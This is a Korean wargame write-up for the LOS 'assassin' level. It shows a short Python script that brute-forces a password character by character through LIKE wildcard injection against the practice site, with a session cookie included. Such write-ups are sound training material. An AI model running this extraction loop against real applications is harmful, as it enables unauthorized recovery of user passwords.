본문으로 바로가기

[LOS]15번 assassin

category Wargame/LOS(eagle-jump) 2017. 8. 3. 06:12


좀 멋있는 친구가 나타났다


클릭해보자




like가 고정되어있고 쿼터가 막혀있기 때문에


보이는 그대로 like를 이용해야 할것같다.


(http://g0pher.tistory.com/182)


%%를 입력하니 guest가 뜬다.


첫글자부터 하나씩 찾아야 한다는 건데


출제자가 admin과 guest의 pw를 앞 몇글자가 동일하도록 만들어놓았을것 같다.


꽁으로 문제를 주진 않았을테니까?




코딩을 하자


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
 
URL = 'http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php'
head='cookie' : 'PHPSESSID=r3k3; __cfduid=d437' }
 
 
 
for i in range(32,127):
    params = {"pw" : chr(i)+"%"}
    res = requests.get(url=URL, params=params, headers=head)
    if "Hello guest" in res.text:
        print(chr(i))
    if "Hello admin" in res.text:
        print(chr(i))
        print("***")
 
cs


음음 머리를 많이 쓰지 않고 약간의 육체노동으로 풀어낼 수 있게 만들었다.


그냥 풀리면 재미없으니까 하하;;;





아무튼 한번 실행해보자




나온 숫자인 8을 앞에 넣고 한번 더 돌려보자





두 번째 글자도 동일하다. 앞에 83을 넣고 한번 더 돌리자




쿠오오오 드디어 나왔다!


admin은 세 번째 자리가 2

guest는 세 번째 자리가 d






'Wargame > LOS(eagle-jump)' 카테고리의 다른 글

[LOS]17번 succubus  (0) 2017.08.04
[LOS]16번 zombie_assassin  (0) 2017.08.03
[LOS]14번 giant  (0) 2017.08.03
[LOS]13번 bugbear  (0) 2017.08.02
[LOS]12번 darkknight  (0) 2017.08.02